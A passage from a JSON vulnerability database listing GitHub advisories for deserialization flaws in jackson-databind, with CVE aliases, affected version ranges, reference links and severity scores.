"2025-09-15T07:42:14.888352Z", "aliases": [ "BIT-nifi-2021-20190", "CVE-2021-20190" ], "summary": "Deserialization of untrusted data in jackson-databind", "details": "A flaw was found in jackson-databind before 2.9.10.7 and 2.6.7.5. FasterXML mishandles the interaction between serialization gadgets and typing. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.7" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/01/GHSA-5949-rw7g-wx7w/GHSA-5949-rw7g-wx7w.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", 
"2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/01/GHSA-5949-rw7g-wx7w/GHSA-5949-rw7g-wx7w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20190" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2854" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r380e9257bacb8551ee6fcf2c59890ae9477b2c78e553fa9ea08e9d9a@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0008" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-01-20T04:44:51Z", "nvd_published_at": "2021-01-19T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", 
"id": "GHSA-5p34-5m6p-p58g", "published": "2020-04-23T21:08:40Z", "modified": "2024-03-14T05:17:58.624150Z", "aliases": [ "CVE-2020-9546" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-5p34-5m6p-p58g/GHSA-5p34-5m6p-p58g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9546" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2631" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200904-0006" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": 
"https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:26:40Z", "nvd_published_at": "2020-03-02T04:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5r5r-6hpj-8gg9", "published": "2021-12-09T19:15:24Z", "modified": 
"2024-02-18T05:42:28.539166Z", "aliases": [ "CVE-2020-35728" ], "summary": "Serialization gadget exploit in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", 
"2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-5r5r-6hpj-8gg9/GHSA-5r5r-6hpj-8gg9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35728" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2999" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/1ca0388c2fb37ac6a06f1c188ae89c41e3e15e84" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210129-0007" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-04-07T22:24:20Z", "nvd_published_at": "2020-12-27T05:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5ww9-j83m-q7qx", "published": "2019-05-23T09:32:24Z", "modified": "2024-03-15T01:17:50.016820Z", "aliases": [ "CVE-2019-12086" ], "summary": "Information exposure in FasterXML jackson-databind", 
"details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.9" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-5ww9-j83m-q7qx/GHSA-5ww9-j83m-q7qx.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.4" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-5ww9-j83m-q7qx/GHSA-5ww9-j83m-q7qx.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" 
}, { "fixed": "2.7.9.6" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-5ww9-j83m-q7qx/GHSA-5ww9-j83m-q7qx.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-5ww9-j83m-q7qx/GHSA-5ww9-j83m-q7qx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12086" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2326" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/efc3c0d02f4743dbaa6d1b9c466772a2f13d966b" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/d30f036208ab1c60bd5ce429cb4f7f1a3e5682e8" }, { 
"type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00030.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UKUALE2TUCKEKOHE2D342PQXN4MWCSLC" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227030031/http://www.securityfocus.com/bid/109227" }, { "type": "WEB", "url": "https://web.archive.org/web/20200808181049/http://russiansecurity.expert/2016/04/20/mysql-connect-file-read" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": 
"WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2935" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2936" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2937" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2938" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2998" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3044" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3045" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3046" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3050" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3f99ae8dcdbd69438cb733d745ee3ad5e852068490719a66509b4592@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88cd25375805950ae7337e669b0cb0eeda98b9604c1b8d806dccbad2@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-05-22T04:34:56Z", "nvd_published_at": "2019-05-17T17:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-645p-88qh-w398", "published": "2019-01-04T19:06:55Z", "modified": "2024-03-16T05:19:17.936174Z", "aliases": [ "CVE-2018-14718" ], "summary": "Arbitrary Code Execution in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.7, 2.8.11.3, 2.7.9.5, and 2.6.7.3 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.7" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-645p-88qh-w398/GHSA-645p-88qh-w398.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, 
{ "fixed": "2.8.11.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-645p-88qh-w398/GHSA-645p-88qh-w398.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-645p-88qh-w398/GHSA-645p-88qh-w398.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-645p-88qh-w398/GHSA-645p-88qh-w398.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14718" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2097" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": 
